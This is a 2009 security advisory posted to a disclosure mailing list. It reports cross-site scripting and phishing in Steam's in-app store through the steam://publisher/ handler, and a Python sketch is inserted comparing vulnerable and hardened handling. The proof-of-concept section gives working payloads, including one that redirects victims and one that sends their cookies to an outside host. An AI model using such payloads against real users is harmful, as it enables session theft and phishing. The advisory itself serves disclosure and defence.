
[Full-disclosure] STEAM (Valve) - Phishing and Cross-site Scripting in internal browser

From: Gabriel Lima <gabriel_at_nospam>
Date: Tue May 19 2009 - 22:25:40 GMT
To: full-disclosure@lists.grok.org.uk


It's possible to input JavaScript/HTML into the Steam Store tab (inside the Steam app) using the Steam
protocol (steam://), which can be exploited from an HTML page.

"steam://publisher/<name> Loads the specified publisher catalogue in the Store. Type the
publisher's name in lowercase, e.g. activision or valve."

When a publisher name that doesn't exist is used, the Steam Store sends the value to the search
system, which is vulnerable to XSS.

The Store tab in Steam doesn't show the URL, so phishing is possible just by redirecting the victim to
a fake site.

VALVE was contacted on May 10, but they had not replied as of May 18.

Works in Internet Explorer.
Tested under Windows XP SP 3 and Windows Vista.


  • Proof of Concept -

[1] Alert with text xss
steam://publisher/<img%20src=a%20onerror=alert('xss')>

[2] PHISHING (in this example, it redirects to falandodeseguranca.com):
steam://publisher/<img%20src=a%20onerror=document.location.href='http'+String.fromCharCode(58,47,47)+' falandodeseguranca.com';>

[3] Getting cookies:
steam://publisher/<img%20src=a%20onerror=document.location.href='http'+String.fromCharCode(58,47,47)+' falandodeseguranca.com'+String.fromCharCode(47)+document.cookie;>
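As an added illustration (not part of this advisory or of Valve's code), a minimal Python model of the store's publisher lookup: the reflecting fall-through to search that the post describes, beside a hardened version that allow-lists the documented lowercase name format and escapes on output. KNOWN_PUBLISHERS, the HTML fragments and the `[a-z0-9]{1,64}` pattern are constructed assumptions.

```python
import html
import re
from urllib.parse import unquote

PREFIX = "steam://publisher/"

# Constructed stand-in for the store's publisher catalogue (not Valve's data).
KNOWN_PUBLISHERS = {"activision", "valve"}

# The documented contract quoted above is "the publisher's name in lowercase".
# Assumed allow-list derived from it: lowercase letters and digits, bounded length.
PUBLISHER_RE = re.compile(r"[a-z0-9]{1,64}")


def parse_publisher(url: str) -> str:
    """Return the percent-decoded <name> from a steam://publisher/<name> URL."""
    if not url.startswith(PREFIX):
        raise ValueError("not a steam://publisher/ URL")
    return unquote(url[len(PREFIX):])


def render_vulnerable(url: str) -> str:
    """Model of the behaviour the post describes: an unknown name falls
    through to search and is reflected into the page unescaped."""
    name = parse_publisher(url)
    if name in KNOWN_PUBLISHERS:
        return f"<h1>Catalogue: {name}</h1>"
    return f"<p>No results for {name}</p>"


def render_hardened(url: str) -> str:
    """Same flow with two fixes: validate the name against the documented
    format before it reaches search, and HTML-escape whatever is echoed."""
    name = parse_publisher(url)
    if not PUBLISHER_RE.fullmatch(name):
        # Generic message: the rejected input is never reflected.
        return "<p>Invalid publisher name.</p>"
    if name in KNOWN_PUBLISHERS:
        return f"<h1>Catalogue: {html.escape(name)}</h1>"
    # Defence in depth: escape even the allow-listed value on output.
    return f"<p>No results for {html.escape(name, quote=True)}</p>"


def reflects_markup(rendered: str) -> bool:
    """Crude comparison aid: did an <img> tag from the input survive into the output?"""
    return "<img" in rendered
```

Feeding PoC [1] from this post to both renderers shows the tag surviving in `render_vulnerable` and being rejected before reflection in `render_hardened`.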


  • More Information -
    The paper showing how it works, a post with screenshots and a video can be found here:

http://www.falandodeseguranca.com/2009/05/vulnerabilidade-no-steam-phishing-e-xss-na-steam-store/ (in Portuguese)
More information: http://www.falandodeseguranca.com

Contact me: gabriel <at> falandodeseguranca.com



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/